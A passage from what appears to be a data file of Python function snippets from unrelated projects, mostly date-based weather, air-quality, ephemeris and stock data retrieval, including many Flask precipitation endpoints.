MM)\n\n x = np.array(x, dtype=np.float32)\n x = x/100.\n h = x[3:-3]\n hours = np.arange(24)\n years, months, days = 0*hours+an, 0*hours+Mesl, 0*hours+int(dd)\n time = []\n for year, month, day, hour in zip(years, months, days, hours):\n time.append( dt.datetime(year, month, day, hour) )\n\n time = mpldates.date2num(time)\n time2 = np.linspace(time[0], time[-1], 500)\n\n interp = interp1d(time, h, kind='cubic')\n h2 = interp(time2)\n\n dh = np.gradient(h2)\n dhSign = dh > 0\n # gathering pairs\n pairs = []\n for k in range(len(dh)-1):\n pairs.append([dhSign[k], dhSign[k+1]])\n\n f = []\n for k in range(len(pairs)):\n if pairs[k] == [True, False] or pairs[k] == [False, True]:\n f.append(k)\n\n datas = mpldates.num2date(time2[f])\n hora = []\n for data in datas:\n hora.append(\"%02i:%02i\" %(data.hour, data.minute))\n altura = h2[f]\n altura = ['%.1f' % a for a in 
altura]\n\n return infoList, hora, altura, time2, h2", "def get_data(table_name, end, num, start=None):\n if start == None:\n if table_name == \"days\": start = end - timedelta(days=num-1) \n if table_name == \"weeks\": start = end - timedelta(weeks=num-1) \n if table_name == \"months\": start = end - relativedelta(months=+num-1) \n if table_name == \"years\": start = end - relativedelta(years=+num-1) \n else: \n start = days.get_entry(table_name, start).date\n \n dates = []\n data = []\n weather = []\n density = []\n \n while start <= end:\n entry = days.get_entry(table_name, start)\n data.append(entry.sentiment)\n \n if table_name == \"days\": \n dates.append(entry.date.strftime(\"%B %d, %Y\"))\n start = start + timedelta(days=1)\n if table_name == \"weeks\": \n dates.append(entry.date.strftime(\"%B %d, %Y\"))\n start = start + timedelta(weeks=1) \n if table_name == \"months\": \n dates.append(entry.date.strftime(\"%B %Y\"))\n start = start + relativedelta(months=+1) \n if table_name == \"years\": \n dates.append(entry.date.strftime(\"%Y\"))\n start = start + relativedelta(years=+1) \n\n # 7/15/15 is the last entry in the current weather dictionary\n num_days = (min(start, date(2015,7,15)) - entry.date).days\n temp = {entry.date + timedelta(days=i): weather_dict[entry.date + timedelta(days=i)] for i in range(num_days)}\n weather.append(float(sum(temp.values()))/float(len(temp)))\n\n if density_dict != None:\n d = max(entry.date, date(2014,7,1))\n num_days = (min(start, date(2015,7,28)) - d).days\n rho = {d + timedelta(days=i): density_dict[d + timedelta(days=i)] for i in range(num_days)}\n density.append(float(sum(rho.values()))/float(len(rho)))\n\n return dates, data, weather, density", "def precipitation():\n # Create a link to the session\n session = Session(engine)\n \n # Query all precipitation records\n results = session.query(Measurements.date, Measurements.prcp).all()\n \n session.close()\n\n # Create a dictionary from the query results\n all_prcp = []\n for date, prcp in results:\n prcp_dict = {}\n prcp_dict[\"date\"] = date\n prcp_dict[\"prcp\"] = prcp\n all_prcp.append(prcp_dict)\n \n return jsonify(all_prcp)", "def precipitation():\r\n # Query all measurements\r\n results = session.query(Measurement).all()\r\n\r\n # Create a dictionary from the row data and append to a list of all_precipitation\r\n all_precipitation = []\r\n\r\n for row in results:\r\n precipitation_dict = { row.date : row.prcp}\r\n all_precipitation.append(precipitation_dict)\r\n # print(all_precipitation)\r\n return jsonify(all_precipitation)", "def precipitation():\n results = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= '2016-08-23').order_by(Measurement.date)\n precipitation_values = []\n for p in results:\n prcp_dict = {}\n prcp_dict[\"date\"] = p.date\n prcp_dict[\"prcp\"] = p.prcp\n precipitation_values.append(prcp_dict)\n\n return jsonify(precipitation_values)", "def gnss_satellite_position(dset: \"Dataset\") -> None:\n file_path = config.files.path(\"output_satellite_position\", file_vars={**dset.vars, **dset.analysis})\n\n # Add date field to dataset\n if \"date\" not in dset.fields:\n dset.add_text(\"date\", val=[d.strftime(\"%Y/%m/%d %H:%M:%S\") for d in dset.time.datetime], write_level=\"detail\")\n \n # Add fields in case of broadcast ephemeris\n if \"broadcast\" in config.tech.apriori_orbit.list:\n if not \"trans_time_gpsweek\" in dset.fields:\n dset.add_text(\n \"trans_time_gpsweek\",\n val=[\n 
f\"{t.gps_ws.week:04.0f}{t.gps_ws.day:1.0f}:{t.gps_ws.seconds:06.0f}\" for t in dset.used_transmission_time\n ],\n write_level=\"detail\",\n )\n if not \"toe_gpsweek\" in dset.fields:\n dset.add_text(\n \"toe_gpsweek\",\n val=[f\"{t.gps_ws.week:04.0f}{t.gps_ws.day:1.0f}:{t.gps_ws.seconds:06.0f}\" for t in dset.used_toe],\n write_level=\"detail\",\n )\n if not \"diff_trans_toe\" in dset.fields:\n dset.add_float(\n \"diff_trans_toe\",\n val=(dset.used_transmission_time.gps.mjd - dset.used_toe.gps.mjd) * Unit.day2second,\n unit=\"second\", \n write_level=\"detail\",\n )\n if not \"age_of_ephemeris\" in dset.fields:\n dset.add_float(\n \"age_of_ephemeris\",\n val=(dset.time.gps.mjd - dset.used_toe.gps.mjd) * Unit.day2second,\n unit=\"second\", \n write_level=\"detail\",\n )\n \n # Select fields available in Dataset\n fields = get_existing_fields(dset, FIELDS)\n\n # Put together fields in an array as specified by the 'dtype' tuple list\n output_list = list(zip(*(get_field(dset, f.field, f.attrs, f.unit) for f in fields)))\n output_array = np.array(output_list, dtype=[(f.name, f.dtype) for f in fields])\n \n # Write to disk\n header = get_header(\n fields,\n pgm_version=f\"where {where.__version__}\",\n run_by=util.get_user_info()[\"inst_abbreviation\"] if \"inst_abbreviation\" in util.get_user_info() else \"\",\n summary=\"GNSS satellite position results\",\n )\n np.savetxt(\n file_path,\n output_array,\n fmt=tuple(f.format for f in fields),\n header=header,\n delimiter=\"\",\n encoding=\"utf8\",\n )", "def getEPADailyData(dateint, dt_ind, month, epa_df, yr):\n\n try:\n start = dateint + dt_ind * 10000\n end = start + 10001\n dly_epa_df = epa_df[(epa_df.created >= start) & (epa_df.created < end)]\n dly_epa_df.reset_index(inplace=True, drop=True)\n\n new_df = pd.DataFrame(columns=['lat', 'lon', 'utc', 'parameter', 'epa_pm25_unit', 'epa_pm25_value', 'raw_concentration', 'aqi', 'category', 'site_name', 'agency_name', 'full_aqs_code', 'intl_aqs_code', 'created'])\n for sitenm in dly_epa_df.site_name.unique():\n indx_ct = 0\n site_df = dly_epa_df[dly_epa_df.site_name == sitenm]\n for i in site_df.created.unique():\n indx_ct += 1\n new_df = pd.concat([new_df,site_df.iloc[indx_ct - 1:indx_ct]],ignore_index=True)\n\n if i != site_df.created.max(): # Don't interpolate the last record\n tmp_df = site_df.iloc[indx_ct - 1:indx_ct][['lat', 'lon', 'utc', 'parameter', 'epa_pm25_unit', 'category', 'site_name', 'agency_name', 'full_aqs_code', 'intl_aqs_code']]\n for j in range(1,6):\n new_dt = i + j * 10\n tmp_df['created'] = int(new_dt)\n tmp_df['epa_pm25_value'] = np.nan\n tmp_df['raw_concentration'] = np.nan\n tmp_df['aqi'] = np.nan\n new_df = pd.concat([new_df,tmp_df],ignore_index=True)\n\n # Convert aqi to numerica for so that it gets interpolated\n new_df[['aqi']] = new_df[['aqi']].replace(\"nan\", np.nan, regex=True)\n new_df[['aqi']] = new_df[['aqi']].apply(pd.to_numeric)\n\n new_df = new_df.interpolate(method='linear', limit_direction='forward', axis=0)\n\n int_epa_df = new_df[(new_df.created >= start) & (new_df.created < (end - 1))]\n int_epa_df.reset_index(inplace=True, drop=True)\n \n # Write to S3\n s3 = s3fs.S3FileSystem()\n myopen = s3.open\n write('midscapstone-whos-polluting-my-air/EpaDaily/epa_20{2}{0}{1:02}.parquet'.format(month, dt_ind, yr), int_epa_df, compression='GZIP', open_with=myopen)\n s3_resource = boto3.resource('s3')\n s3_resource.Object('midscapstone-whos-polluting-my-air', 'EpaDaily/epa_20{2}{0}{1:02}.parquet'.format(month, dt_ind, yr)).Acl().put(ACL='public-read')\n\n except 
Exception as e:\n print(\"*** EXCEPTION IN GET EPA DAILY DATA *** {}\".format(e))\n return int_epa_df", "def all_obs_v3pa_on_date(pointing_filename, date=None, verbose=False):\n results = {}\n pointing_table = apt_inputs.AptInput().get_pointing_info(pointing_filename, 0)\n obsnums = sorted(list(set(pointing_table['obs_num'])))\n for obs_num in obsnums:\n results[obs_num] = default_obs_v3pa_on_date(pointing_filename, int(obs_num), date=date, verbose=verbose,\n pointing_table=pointing_table)\n return results", "def _get_data(self):\n \n print(\"Getting Data...\")\n self.data = sgs.dataframe(self.serie_name, \n start = self.start_date, \n end = self.end_date)\n\n print(f\"Done! {self.data.shape[0]} rows were collected\")\n \n self.data.reset_index(inplace=True)\n self.data.columns = ['date', 'cdi']\n\n return self.data", "def precipitation():\n results_precip = engine.execute(\"SELECT date, prcp FROM Measurement WHERE date BETWEEN '2016-08-23' AND '2017-08-23'\").fetchall()\n\n # Convert list of tuples into normal list\n precip_dict = dict(results_precip)\n\n return jsonify(precip_dict)", "def prepare_data(self,query,user=0,daytype=\"A\"):\n # check if input is a string, parse to an array\n if type(query) is str:\n query = geoutil.parse_coords_array(query)\n \n # load data\n if user == 0:\n data = taxi.loadCsv()\n else:\n data = taxi.loadRelated(user)\n \n # 0th row has only column names\n paths = list()\n\n # A for normal day, B for holiday, C for day before holiday\n # depending on the length of a query, set minimum length\n min_length = len(query)/2\n\n for x in range(1,len(data)):\n points = taxi.pointsListConverter(data[x][8])\n if data[x][6]==daytype and len(points)>min_length:\n # convert data to array of tuples of float values\n geopoints = geoutil.convert_points(points)\n if taxi.containing(geopoints,query):\n paths.append(geopoints)\n\n self.query = query\n # pass all paths and generate big array of float points\n try:\n allPoints = numpy.concatenate(paths)\n output_points = []\n for point in allPoints[:-1]:\n output_points.append({\n \"lat\":point[1],\n \"long\":point[0]\n })\n self.training = allPoints[:-1]\n return self.training,query\n except Exception as e:\n print(\"No paths found: \"+str(e))\n return [],query", "def fetch_sundata(self, date: datetime) -> Sundata:\n pass", "def _get_data_pre2007(date):\n #the data is obtained from one file for each year.\n\n url = '{}/Environmental_Data_{}/'.format(BASE_URL, date.year)\n print('Fetching online data for {} (full year)'.format(date.year))\n\n try:\n year_data = request.urlopen(url).read().decode(encoding='utf_8').split('\\n')\n except:\n raise ValueError(date)\n else:\n year_data.pop(0)\n\n for line in year_data:\n elements = line.split()\n yield dict(Date = elements[0],\n Time = elements[1],\n Status = 'COMPLETE',\n Air_Temp = elements[5],\n Barometric_Press = elements[7],\n Wind_Speed = elements[2])", "def precipitation():\n # Query for the dates and precipitation observations from the last year.\n # Convert the query results to a Dictionary using `date` as the key and `prcp` as the value.\n # Return the json representation of your dictionary.\n query_date = session.query(Measurement.date).order_by(Measurement.date.desc()).first() \n query_date = query_date[0]\n query_date = dt.datetime.strptime(query_date,'%Y-%m-%d').date()\n start_date_datetime = query_date - dt.timedelta(days=365)\n results= session.query(Measurement.date, Measurement.prcp).\\\n filter (Measurement.date >= start_date_datetime).all()\n prcp= {date:prcp for 
date,prcp in results}\n    return jsonify (prcp)", "def precipitation():\n    # Query \n    results = session.query(Measurement.date, Measurement.prcp).all()\n    \n    dict = {}\n    for result in results:\n        dict[result.date] = result.prcp\n\n    return jsonify(dict)", "def get_daily(Data, Y, M, D):\n    start = datetime(year=Y, month=M, day=D, hour=0, minute=0)\n    end = datetime(year=Y, month=M, day=D, hour=23, minute=59, second=59)\n    return Data[start:end][\"clouds\"].map(value_by_cloud)", "def collect_data_date(self, date=None):\n    if date is None:\n        date = self.date\n    # TODO make it so it doesn't re-collect all data and just adds historical data\n    self.collect_all_stock_data()", "def precipitation():\n    precip = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= prev_year).all()\n\n    # Create a dictionary from the row data and append to a list \n    precip_dict = {}\n    for date, prcp in precip:\n        if prcp !=None:\n            precip_dict.setdefault(date, []).append(prcp)\n\n    return jsonify(precip_dict)", "def calculate_cdf(self):\n    df_cdf = self.get_cdf_data()\n    return ECDF(df_cdf['minute'])", "def get_daily_data():\n    class C:\n        pass\n\n    def get_ticker(ticker):\n        vals = []\n\n        datafile = cbook.get_sample_data('%s.csv' % ticker, asfileobj=False)\n\n        lines = open(datafile).readlines()\n        for line in lines[1:]:\n            vals.append([float(val) for val in line.split(',')[1:]])\n\n        M = array(vals)\n        c = C()\n        c.open = M[:, 0]\n        c.high = M[:, 1]\n        c.low = M[:, 2]\n        c.close = M[:, 3]\n        c.volume = M[:, 4]\n        return c\n    c1 = get_ticker('intc')\n    c2 = get_ticker('msft')\n    return c1, c2", "def precipitation():\n\n    precip_results = session.query(Measurements.date, Measurements.prcp).filter(Measurements.date >= '2016-08-23').\\\n    group_by(Measurements.date).\\\n    order_by(Measurements.date.desc()).all()\n\n    # Create a dictionary from the row data and append to a list of all_passengers\n    precip_data = []\n    for row in precip_results:\n        precip_dict = {}\n        precip_dict[\"date\"] = row.date\n        precip_dict[\"precip\"] = row.prcp\n        precip_data.append(precip_dict)\n\n    return jsonify(precip_data)", "def _construct_all_positions(self):\n        d = dict((s, 0) for s in self.symbol_list)\n        d['datetime'] = self.backtest_date\n        return [d]", "def ProvideEphemerisData(self):\n        return _gmat_py.EphemManager_ProvideEphemerisData(self)", "def __calc_CoagS(self):\n\n        Dp_small = self.dp_lim[0]*1e-9 # in m\n        temp = self.temp_data # Kelvin\n        pres = self.pres_data # Pascal\n        Dp = self.par_diam*1e-9 # m\n        time = self.par_time # days\n        N = self.__dNdlog2dN(Dp,self.smoothed_par_data) # cm-3\n        findex = np.argwhere(Dp>=Dp_small).flatten()\n        big_R = Dp[findex]/2.\n        big_N = N[:,findex]\n        k_B = 1.38064852e-23 # Boltzmann constant m2 kg s-2 K-1\n        r0=Dp_small/2.\n        r1=r0\n        dens=1000.\n        self.CoagS=np.zeros(time.shape)\n        for i in range(0,len(time)):\n            lamda=(6.73e-8*temp[i]*(1+(110.4/temp[i])))/(296*pres[i]/101325.0*1.373)\n            myy=(1.832e-5*(temp[i]**(1.5))*406.4)/(5093*(temp[i]+110.4))\n            kn1=lamda/r1\n            kn=lamda/big_R\n            CC= 1.+(kn*(1.142+(0.558*np.exp((-.999)/kn))))\n            CC1= 1. 
+ (kn1*(1.142+(0.558*np.exp((-.999)/kn1))))\n D = (k_B*temp[i]*CC)/(6.*np.pi*myy*big_R)\n D1 = (k_B*temp[i]*CC1)/(6.*np.pi*myy*r1)\n M = 4./3.*np.pi*(big_R**3)*dens\n M1 = 4./3.*np.pi*(r1**3)*dens\n c= np.sqrt((8.*k_B*temp[i])/(np.pi*M))\n c1= np.sqrt((8.*k_B*temp[i])/(np.pi*M1))\n c12= np.sqrt((c**2)+(c1**2))\n r12= big_R+r1\n D12= D+D1\n CCONT = 4.*np.pi*r12*D12\n CFR = np.pi*r12*r12*c12\n L=(8.*D)/(np.pi*c)\n L1=(8.*D1)/(np.pi*c1)\n SIG=(1./(3.*r12*L))*((r12+L)**3-(r12*r12+L*L)**1.5)-r12\n SIG1=(1./(3.*r12*L1))*((r12+L1)**3-(r12*r12+L1*L1)**1.5)-r12\n SIG12= np.sqrt((SIG**2)+(SIG1**2))\n KO=CCONT/((r12/(r12+SIG12))+(CCONT/CFR))\n self.CoagS[i] = np.nansum(KO*big_N[i,:]*1e6)\n if (r0==big_R[0]):\n self.CoagS[i] = 0.5*KO*big_N[i,0]*1e6+np.nansum(KO*big_N[i,1:]*1e6)\n else:\n self.CoagS[i] = np.nansum(KO*big_N[i,:]*1e6)", "def pick_data(eop_data, time, window):\n if time.isscalar:\n start_time = np.floor(time.utc.mjd) - window // 2\n end_time = np.ceil(time.utc.mjd) + window // 2\n else:\n start_time = np.floor(time.min().utc.mjd) - window // 2\n end_time = np.ceil(time.max().utc.mjd) + window // 2\n\n try:\n return {d: eop_data[d].copy() for d in np.arange(start_time, end_time + 1)}\n except KeyError:\n paths = [str(files.path(k)) for k in _EOP_FILE_KEYS]\n raise MissingDataError(\n \"Not all days in the time period {:.0f} - {:.0f} MJD were found in EOP-files {}\"\n \"\".format(start_time, end_time, \", \".join(paths))\n )", "def _interpolate_meteorological_data(dset, data, rundate):\n rundate = datetime(rundate.year, rundate.month, rundate.day)\n for field, station in [(f, f[4:]) for f in data.keys() if f.startswith(\"met_\")]:\n log.debug(f\"Meteorological data available for station {station}\")\n\n met_time = data[field].pop(\"met_time\")\n flat_list = [item for sublist in met_time for item in sublist]\n met_time_float = np.array([(flat_list[i] - rundate).total_seconds() for i in range(0, len(flat_list))])\n met_time_unique, met_index = np.unique(met_time_float, return_index=True)\n\n diff = len(met_time_float) - len(met_time_unique)\n if diff > 0:\n log.dev(f\"Removed duplicate met data for station {station}\")\n log.dev(\"Do this for the actual obs data also!\")\n if len(met_time_unique) == 1:\n for met_type in data[field].keys():\n data[field][met_type] = np.repeat(data[field][met_type][0], dset.num_obs)\n continue\n\n # Extrapolation one month before/after\n # (this is overkill, most of these values will be removed later when taking the diagonal)\n min_time = min(met_time_unique) - 31 * 86400\n max_time = max(met_time_unique) + 31 * 86400\n met_time_unique = np.hstack((np.array(min_time), met_time_unique, np.array(max_time)))\n\n for met_type in data[field].keys():\n met_data_array = data[field][met_type]\n flat_list = [item for sublist in met_data_array for item in sublist]\n met_data_array = np.array([flat_list[i] for i in met_index])\n met_data_array = np.hstack((met_data_array[0], met_data_array, met_data_array[-1]))\n data[field][met_type] = interpolation.interpolate(\n met_time_unique, met_data_array, dset.obs_time, kind=\"cubic\"\n )\n\n return data", "def prcp():\n \n #get max and year_past date from DB\n max_dt, yr_past = get_year_past()\n \n session = Session(engine)\n # Query all Measurement Table to get precipitation date for all available dates\n results = session.query(func.strftime('%Y-%m-%d',M.date), coalesce(M.prcp,0)).\\\n filter(M.date >= yr_past).order_by(M.date).all()\n \n session.close()\n \n # Convert list of tuples into dict with date as the key and 
precipitation as value\n prcp_dict = [{d:p} for d,p in results]\n \n return jsonify(prcp_dict)", "def daily_price():\n for item in data:\n if valid_date(item):\n yield data[item]['daily_value']", "def precipitation():\n\n # first select the latest date\n latest_date, new_date = get_latest_date()\n\n # select date and precip for last 12 months\n results = session.query(Measurement.date, Measurement.prcp). \\\n filter(Measurement.date >= new_date). \\\n order_by(Measurement.date).all()\n\n # convert results to dictionary\n prec_dict = {}\n\n for r in results:\n prec_dict[r.date] = r.prcp\n\n return jsonify(prec_dict)", "def precipitation():\n # Query all dates and precipitation levels from the last year \n precip_data = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= \"2016-08-23\").order_by(Measurement.date).all()\n # Convert list of tuples into normal list\n all_precip = list(np.ravel(precip_data))\n\n return jsonify(all_precip)", "def process(date, lat_oi, lon_oi, shared_args, verbose=False):\n \n filename = download(date, shared_args)\n\n atmo_data = data.open_netcdf4(filename)\n\n # choose points\n lat = atmo_data.variables['lat'][:]\n lon = atmo_data.variables['lon'][:]\n lat = numpy.stack([lat]*lon.shape[0], axis=0)\n lon = numpy.stack([lon]*lat.shape[1], axis=1)\n chosen_idxs, data_coor = funcs.choose_points(lat, lon, lat_oi, lon_oi)\n\n latidx = tuple(chosen_idxs[0])\n lonidx = tuple(chosen_idxs[1])\n \n t1, t2 = data.closest_hours(atmo_data.variables['time'][:].data,\n atmo_data.variables['time'].units, date)\n t1_dt = num2date(atmo_data.variables['time'][t1], atmo_data.variables['time'].units)\n t2_dt = num2date(atmo_data.variables['time'][t2], atmo_data.variables['time'].units)\n\n index1 = (t1, slice(None), latidx, lonidx)\n index2 = (t2, slice(None), latidx, lonidx)\n\n press = numpy.array(atmo_data.variables['lev'][:])\n\n temp1 = numpy.empty\n temp2 = numpy.empty\n \n temp1 = numpy.diagonal(atmo_data.variables['T'][index1], axis1=1, axis2=2).T\n temp2 = numpy.diagonal(atmo_data.variables['T'][index2], axis1=1, axis2=2).T\n\n rhum1 = numpy.diagonal(atmo_data.variables['RH'][index1], axis1=1, axis2=2).T # relative humidity\n rhum2 = numpy.diagonal(atmo_data.variables['RH'][index2], axis1=1, axis2=2).T\n\n height1 = numpy.diagonal(atmo_data.variables['H'][index1], axis1=1, axis2=2).T / 1000.0 # height\n height2 = numpy.diagonal(atmo_data.variables['H'][index2], axis1=1, axis2=2).T / 1000.0\n\n # interpolate in time, now they are shape (4, N)\n t = interp.interp_time(date, temp1, temp2, t1_dt, t2_dt)\n h = interp.interp_time(date, height1, height2, t1_dt, t2_dt)\n rh = interp.interp_time(date, rhum1, rhum2, t1_dt, t2_dt)\n \n # interpolate in space, now they are shape (1, N)\n height = interp.idw(h, data_coor, [lat_oi, lon_oi])\n temp = interp.idw(t, data_coor, [lat_oi, lon_oi])\n relhum = interp.idw(rh, data_coor, [lat_oi, lon_oi])\n \n # calculate the number of nan and zero values in the array and remove them, reducing the size of the array accordingly\n nr_of_nans1 = numpy.sum(temp1[0].mask)\n nr_of_nans2 = numpy.sum(temp2[0].mask)\n nr_of_nans = max([nr_of_nans1,nr_of_nans2])\n \n height = height[nr_of_nans:]\n temp = temp[nr_of_nans:]\n relhum = relhum[nr_of_nans:]\n press = press[nr_of_nans:]\n\n # load standard atmosphere for mid-lat summer\n # TODO evaluate standard atmo validity, add different ones for different TOY?\n stan_atmo = numpy.loadtxt(settings.STAN_ATMO, unpack=True)\n stan_height, stan_press, stan_temp, stan_relhum = stan_atmo\n # 
add standard atmo above cutoff index\n \n cutoff_idx = numpy.abs(stan_press - press[-1]).argmin()\n height = numpy.append(height, stan_height[cutoff_idx:])\n press = numpy.append(press, stan_press[cutoff_idx:])\n temp = numpy.append(temp, stan_temp[cutoff_idx:])\n relhum = numpy.append(relhum, stan_relhum[cutoff_idx:])\n \n # Convert relative humidity to percentage for modtran\n relhum = relhum * 100\n\n # TODO add buoy stuff to bottom of atmosphere\n\n if verbose:\n # send out plots and stuff\n stuff = numpy.asarray([height, press, temp, relhum]).T\n h = 'Height [km], Pressure[kPa], Temperature[k], Relative_Humidity[0-100]' + '\\nCoordinates: {0} Buoy:{1}'.format(data_coor, buoy)\n \n numpy.savetxt('atmosphere_{0}_{1}_{2}.txt'.format('merra', date.strftime('%Y%m%d'), buoy.id), stuff, fmt='%7.2f, %7.2f, %7.2f, %7.2f', header=h)\n\n return height, press, temp, relhum", "def precipitation():\n last_date = session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n last_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n rain = session.query(Measurement.date, Measurement.prcp).\\\n filter(Measurement.date > last_year).\\\n order_by(Measurement.date).all()", "def precipitation():\r\n # Calculate the date 1 year ago from last date in database\r\n prev_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)\r\n\r\n # Query for the date and precipitation for the last year\r\n precipitation = session.query(Measurement.date, Measurement.prcp).\\\r\n filter(Measurement.date >= prev_year).all()\r\n\r\n # Dict with date as the key and prcp as the value\r\n precip = {date: prcp for date, prcp in precipitation}\r\n return jsonify(precip)", "def to_stock_data_day(self, date):\n if type(date) is not datetime.datetime and type(date) is not pd.tslib.Timestamp:\n date = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n\n dataframes = [i for i in dir(self) if not callable(getattr(self, i)) and not i.startswith(\"__\")\n and type(getattr(self, i)) is pd.DataFrame]\n dictionaries = [i for i in dir(self) if not callable(getattr(self, i)) and not i.startswith(\"__\")\n and type(getattr(self, i)) is dict]\n constant_values = [i for i in dir(self) if not callable(getattr(self, i)) and not i.startswith(\"__\")\n and getattr(self, i) is not None and i not in dataframes and i not in dictionaries]\n new_stock_data = StockData()\n\n for i in dataframes + dictionaries:\n setattr(new_stock_data, i, getattr(self, i)[date])\n\n for i in constant_values:\n setattr(new_stock_data, i, getattr(self, i))\n\n new_stock_data.dates = [date]\n new_stock_data.str_dates = [str(date)[:USEFUL_TIMESTAMP_CHARS]]\n\n return new_stock_data", "def _build_parsed_values(self):\n\n # \n # Generate a time data particle.\n # Note that raw_data already contains the individual fields\n # extracted and unpacked from the time data record.\n #\n particle = [\n {\n DataParticleKey.VALUE_ID: \n Vel3dKWfpStcTimeDataParticleKey.TIME_ON, \n DataParticleKey.VALUE: self.raw_data[INDEX_TIME_ON]\n },\n {\n DataParticleKey.VALUE_ID: \n Vel3dKWfpStcTimeDataParticleKey.TIME_OFF,\n DataParticleKey.VALUE: self.raw_data[INDEX_TIME_OFF]\n },\n {\n DataParticleKey.VALUE_ID: \n Vel3dKWfpStcTimeDataParticleKey.NUMBER_OF_RECORDS, \n DataParticleKey.VALUE: self.raw_data[INDEX_RECORDS]\n }\n ]\n\n return particle", "def _get_input_data(self, var, start_date, end_date):\n logging.info(self._print_verbose(\"Getting input data:\", var))\n # Pass numerical constants as is.\n if isinstance(var, (float, int)):\n return var\n # aospy.Var objects remain.\n # 
Pressure handled specially due to complications from sigma vs. p.\n elif var.name in ('p', 'dp'):\n data = self._get_pressure_vals(var, start_date, end_date)\n if self.dtype_in_vert == internal_names.ETA_STR:\n return self._to_desired_dates(data)\n return data\n # Get grid, time, etc. arrays directly from model object\n elif var.name in (internal_names.LAT_STR, internal_names.LON_STR,\n internal_names.TIME_STR, internal_names.PLEVEL_STR,\n internal_names.PK_STR, internal_names.BK_STR,\n internal_names.SFC_AREA_STR):\n data = getattr(self.model, var.name)\n else:\n cond_pfull = ((not hasattr(self, internal_names.PFULL_STR))\n and var.def_vert and\n self.dtype_in_vert == internal_names.ETA_STR)\n data = self.data_loader.load_variable(var, start_date, end_date,\n self.time_offset,\n **self.data_loader_attrs)\n name = data.name\n data = self._add_grid_attributes(data.to_dataset(name=data.name))\n data = data[name]\n if cond_pfull:\n try:\n self.pfull_coord = data[internal_names.PFULL_STR]\n except KeyError:\n pass\n # Force all data to be at full pressure levels, not half levels.\n bool_to_pfull = (self.dtype_in_vert == internal_names.ETA_STR and\n var.def_vert == internal_names.PHALF_STR)\n if bool_to_pfull:\n data = utils.vertcoord.to_pfull_from_phalf(data,\n self.pfull_coord)\n if var.def_time:\n # Restrict to the desired dates within each year.\n if self.dtype_in_time != 'av':\n return self._to_desired_dates(data)\n else:\n return data", "def get_equity_data(date=None):\n\n equity_info_list = []\n if date is None:\n equity_data_zip_file_url = __class__.get_href_for_latest_equity_data()\n else:\n equity_data_zip_file_url = __class__.get_zip_file_url_for_specific_date(date)\n\n url = urllib.request.urlopen(equity_data_zip_file_url)\n\n with ZipFile(BytesIO(url.read())) as my_zip_file:\n for contained_file in my_zip_file.namelist():\n with my_zip_file.open(contained_file) as csv_file:\n df = pd.read_csv(csv_file)\n for idx, row in df.iterrows():\n code = row['SC_CODE']\n name = row['SC_NAME'].strip().strip(\",.\")\n group = row['SC_GROUP'].strip().strip(\",.\")\n type_abbr = row['SC_TYPE'].strip().strip(\",.\")\n open = row['OPEN']\n high = row['HIGH']\n low = row['LOW']\n close = row['CLOSE']\n last = row['LAST']\n prev_close = row['PREVCLOSE']\n no_of_trades = row['NO_TRADES']\n no_of_shares = row['NO_OF_SHRS']\n net_turnov = row['NET_TURNOV']\n\n equity_info = EquityInfo(code, name, group, type_abbr, open, high, low, close, last,\n prev_close, no_of_trades, no_of_shares, net_turnov)\n equity_info_list.append(equity_info)\n\n return equity_info_list", "def createDates(self, data: QDate=None):\n if data is None:\n data = self.oggi\n # print('CREATEDATES DATA', data)\n dateList = MeseGiorniDictGen.bigList(data)\n return dateList", "def ProvideEphemerisData(self):\n return _gmat_py.Spacecraft_ProvideEphemerisData(self)", "def solve(self,n_days = 100,init_state = None,start_date = None,d = 1):\n\n # If init state is not given we use I0\n if init_state is None:\n assert self.start_state is not None\n init_state = int(self.I0)\n\n # Transform init_state into state object\n init_state = self.make_state(init_state)\n\n # Safety checks\n tol = 2\n assert hasattr(self,\"compartments\")\n assert len(init_state) == len(self.compartments)\n # assert hasattr(self,\"N\")\n # assert np.abs(init_state.sum() - self.N) < tol,f\"Init state {init_state.values} does not sum to total population {self.N}\"\n assert n_days > self.offset\n \n # Grid of time points (in days)\n # Take offset into account\n offset = 
self.offset\n t = np.linspace(0, n_days - offset, (n_days - offset +1)*d)\n\n # Integrate the model equations over the time grid, t.\n states = odeint(self.derivative, init_state, t)\n\n # Converts to DataFrame and then to custom object\n states = pd.DataFrame(states,columns = self.compartments)\n if d > 1: \n states.index = states.index / d\n\n # Add offset into account\n if offset > 0:\n states.index = range(offset,n_days + 1)\n states = states.reindex(range(0,n_days + 1))\n states = states.fillna(method = \"bfill\")\n elif offset < 0:\n states.index = [x + offset for x in states.index]\n\n # Convert to custom object\n states = CompartmentStates(states)\n states.build_aggregates(self.states)\n\n # If start date is given, convert to dates\n if self.start_date is not None:\n start_date = self.start_date\n if start_date is not None:\n index = pd.to_datetime(start_date) + pd.TimedeltaIndex(states.index,unit = \"D\")\n states.index = index\n \n return states", "def get_result_ephemeris(self, run_number, force_update=False) -> pd.DataFrame:\n\n ephemeris_text = self.get_result_raw_ephemeris(run_number, force_update)\n ephemeris = stk.io.ephemeris_file_data_to_dataframe(ephemeris_text.splitlines())\n return ephemeris", "def _get_all_data(self, start_date, end_date):\n return [self._prep_data(self._get_input_data(var, start_date,\n end_date),\n self.var.func_input_dtype)\n for n, var in enumerate(self.variables)]", "def precipitation():\n # Create our session (link) from Python to the DB\n \n session = Session(engine)\n\n \"\"\"Return a list of all precipiation values for the last 12 months\"\"\"\n # Example # results = session.query(Passenger.name).all()\n\n\n results = session.query(Measurement.date, func.avg(Measurement.prcp)).\\\n filter(Measurement.date > '2016-08-23').\\\n group_by(Measurement.date).\\\n order_by(Measurement.date).all()\n\n # Close session\n\n session.close()\n\n prcp = []\n \n for date, average in results:\n prcp_dict = {}\n prcp_dict['Date'] = date\n prcp_dict['Avg. Precipitation'] = average\n prcp.append(prcp_dict)\n \n # jsonify the results\n return jsonify(prcp)\n\n # Convert list of tuples into normal list\n # Example # all_names = list(np.ravel(results))", "def __init__(self, year=None, month=None, day=None, map_type='Cases'):\n self.covid_df = pd.DataFrame([])\n self.geo_data = pd.DataFrame([])\n self.name_iso2_mapping = {}\n self.countries_centroids = pd.DataFrame([])\n \n try:\n self.date = datetime(year=year, month=month, day=day)\n 